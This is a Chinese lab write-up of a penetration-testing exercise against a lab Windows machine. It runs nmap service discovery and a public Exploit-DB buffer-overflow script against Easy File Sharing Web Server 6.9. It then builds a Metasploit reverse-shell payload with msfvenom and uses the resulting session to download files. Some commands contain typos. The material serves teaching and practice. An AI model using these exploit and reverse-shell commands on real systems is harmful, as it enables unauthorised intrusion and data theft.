实验目的:
一、漏洞渗透测试
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
3、利用该漏洞,使得靶机运行计算器。
二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
实验一:
在整个实验过程中。kali都要以管理员身份运行:
nmap进行扫描整个子网,可以发现靶机存活:(靶机ip为192.168.140.175,这个是已知的)
在靶机上运行Easy File Sharing Web Server 6.9,因为80端口可能会被占用,所以这里我们改为8080,点击restart后点击start即可:
在kali中我们用nmap -sV 目标ip 命令进行扫描可知靶机8080端口运行Easy File Sharing Web Server 6.9服务:
用【searchsploit 服务 】命令查看服务漏洞,这里我们运用HEAD Request Buffer Overflow的漏洞
运用以下自带攻击代码进行漏洞攻击,前面都是一样,后面加靶机ip及端口号。
python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.140.175 8080
运行成功后返回靶机,可看到软件进程崩溃,并弹出计算机。
实验二:
1.生成被控端:
也是在管理员身份下做,下面命令用来在kali中生成被控端(Windows为例)的可运行程序exe,其中lhost要改为自己kali的ip
sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.140.157=5000 -f exe -o /var/payload.exe
可看到生成了payload.exe在刚刚的路径。
将文件复制到靶机上(Windows为例)
在kali上按以下命令可知payloads的各种漏洞。
2.生成主控端
有了被控端,那我们要生成个主控端来控制,接下来输入msfconsole启动Metasploit(因为主控端需要在Metasploit中启动)。
然后设置攻击载荷(就是被控端)为windows/meterpreter/revese——tcp,设置lhost为192.168.140.157(为你之前所设置的lhost),设置端口为5000,设置完成后等待对方上线。
双击靶机的exe程序运行,返回kali,可以看到已经连上,因为exe程序是个反向病毒,运行后会自动连接所带ip及端口的主控端。
连接上后我们就可以远程操控了,下载靶机文件的命令
download 【文件路径】
可以看到1111.txt文件已经被主控端获取。(其他文件都可以进行下载)